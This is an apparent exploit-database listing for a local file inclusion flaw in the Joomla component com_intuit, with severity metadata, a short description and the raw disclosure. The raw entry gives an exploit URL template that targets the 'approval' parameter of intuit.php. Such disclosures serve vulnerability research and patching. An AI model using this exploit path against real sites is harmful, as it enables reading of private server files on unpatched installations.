header-logo
Suggest Exploit
vendor:
com_intuit
by:
Fl0riX
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: com_intuit
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Joomla Component com_intuit Local File Inclusion Vulnerability

The Joomla component com_intuit is vulnerable to local file inclusion. An attacker can exploit this vulnerability by injecting malicious code in the 'approval' parameter of the 'intuit.php' file.

Mitigation:

The vendor has not provided any specific mitigation for this vulnerability. It is recommended to update to the latest version of the component or apply security patches if available.
Source

Exploit-DB raw data:

[++] Joomla Component com_intuit Local File Inclusion Vulnerability

[++] Author     : Fl0riX

[++] Special Thanks : Deep-Power , PyskE And All Friends

***************************************************************************************************************
[++] ERR0R CODE:
if ($response["approval"] != "")
  {
   //print_r($intuit_fields['succ_msg2']['g_value']);
****************************************************************************************************************
[++] exploit:

[++] http://server/component/com_intuit/models/intuit.php?approval=[lfi]

**************************************************************